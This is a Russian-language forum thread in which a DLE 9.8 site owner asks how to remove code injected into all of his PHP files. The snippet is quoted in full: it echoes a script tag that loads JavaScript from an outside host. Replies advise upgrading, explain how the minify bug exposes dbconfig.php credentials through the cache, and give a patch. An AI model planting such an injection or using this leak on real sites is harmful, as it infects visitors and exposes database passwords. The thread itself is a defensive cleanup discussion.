• DONATE to NULLED!
    Форуму и его команде можно помочь, мотивировать модераторов разделов.
    Помогите модератору этого раздела killoff лично.

Помощь Взлом

Forza.Baron

Гуру форума
Регистрация
26 Янв 2012
Сообщения
177
Реакции
79
Взламывают сайт. 9.8 дле, применил баг минифи...
На все php файлы в конец добавляется такой код:
PHP:
<?php
#aab978#
if(empty($qdf)) {
$qdf = "<script type=\"text/javascript\" src=\"http://foschicago.com/lymvwdxf.php?id=804701\"></script>";
echo $qdf;
}
#/aab978#
?>
#aab978# - на всех файлах разный...

Кто сталкивалься таким "взлом"ом? Как найти и удалить "вирус"...?
 
Версии 10.0 и ниже - уязвимы!

Я наверное блокер напишу, который блочит nulled до тех пор, пока человек не напишет 100 раз "Я буду обновлять DLE до безопасных версий... Я больше не буду некрофилом!"

Удаляем все файлы, ставим поверх DLE 10.5 (10.4), восстанавливает вложения, обновляем шаблон - радуемся жизни...

Ну а если тупо вырезать - notepad++ в помощь. Ctrl+f -> поиск по файлам, заменить вот эту херню на пусто... Ну и бросаем в атаку на папку сайта... Только вирус на 9.8 вернётся через сутки...
 
Из-за уязвимости хакеры могли получать доступ к базе данных и в дальнейшем производить с ней любые действия.

С помощью определенных действий хакер может отправить в кеш файл /engine/data/dbconfig.php, в котором хранятся имя БД, пользователь и пароль для подключения к базе данных вашего сайта. После взлома в папке engine/cache/system/ появляется файл с названиям minify_dbconfig.php.js_5cf6c499f8c1dd32450a5bf6981022a5, цифры в конце названия могут быть любыми. В них и хранятся пароли к БД, его хакер в легкостью сможет прочитать.

Для закрытия уязвимости:

Откройте файл: /engine/classes/min/index.php и в самое начало файла после строчки:

<?php
добавьте:

if(isset($_GET['f'])){
$_GET['f']= str_replace(chr(0),'',(string)$_GET['f']);}
Мне вот интересно, если подключиться к базе можно только из локалки, как они к ней могут подключиться без доступа к файлам.
Как вариант припарковать домен на тот же сервер, есть еще варианты?
 
Назад
Сверху